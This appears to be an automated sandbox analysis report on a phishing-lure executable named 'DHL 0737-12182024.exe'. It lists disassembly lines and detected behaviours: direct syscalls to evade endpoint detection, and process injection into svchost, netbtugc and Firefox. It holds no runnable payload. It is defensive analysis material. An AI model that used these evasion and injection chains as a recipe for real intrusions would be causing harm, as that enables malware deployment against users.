            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h]2_2_03A04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h]2_2_03986AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h]2_2_03930AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h]2_2_039BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA38 mov eax, dword ptr fs:[00000030h]2_2_0396CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h]2_2_0396CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h]2_2_0395EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEA60 mov eax, dword ptr fs:[00000030h]2_2_039DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h]2_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h]2_2_039649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h]2_2_039FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h]2_2_039C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h]2_2_039BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h]2_2_039BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B892A mov eax, dword ptr fs:[00000030h]2_2_039B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C892B mov eax, dword ptr fs:[00000030h]2_2_039C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h]2_2_039B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h]2_2_039BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov edx, dword ptr fs:[00000030h]2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h]2_2_039BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930887 mov eax, dword ptr fs:[00000030h]2_2_03930887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h]2_2_0395E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h]2_2_039FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h]2_2_039BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov ecx, dword ptr fs:[00000030h]2_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A830 mov eax, dword ptr fs:[00000030h]2_2_0396A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D483A mov eax, dword ptr fs:[00000030h]2_2_039D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D483A mov eax, dword ptr fs:[00000030h]2_2_039D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960854 mov eax, dword ptr fs:[00000030h]2_2_03960854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934859 mov eax, dword ptr fs:[00000030h]2_2_03934859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934859 mov eax, dword ptr fs:[00000030h]2_2_03934859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03942840 mov ecx, dword ptr fs:[00000030h]2_2_03942840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE872 mov eax, dword ptr fs:[00000030h]2_2_039BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE872 mov eax, dword ptr fs:[00000030h]2_2_039BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6870 mov eax, dword ptr fs:[00000030h]2_2_039C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6870 mov eax, dword ptr fs:[00000030h]2_2_039C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962F98 mov eax, dword ptr fs:[00000030h]2_2_03962F98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962F98 mov eax, dword ptr fs:[00000030h]2_2_03962F98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CF80 mov eax, dword ptr fs:[00000030h]2_2_0396CF80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04FE7 mov eax, dword ptr fs:[00000030h]2_2_03A04FE7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392EFD8 mov eax, dword ptr fs:[00000030h]2_2_0392EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392EFD8 mov eax, dword ptr fs:[00000030h]2_2_0392EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392EFD8 mov eax, dword ptr fs:[00000030h]2_2_0392EFD8
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00880B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00880B62
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00852622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00852622
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0084083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0084083F
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008409D5 SetUnhandledExceptionFilter,0_2_008409D5
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00840C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00840C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 7056Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2FDE008Jump to behavior
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00881201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00881201
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00862BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00862BA5
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0088B226 SendInput,keybd_event,0_2_0088B226
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008A22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_008A22DA
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 0737-12182024.exe"Jump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00880B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00880B62
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00881663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00881663
            Source: DHL 0737-12182024.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
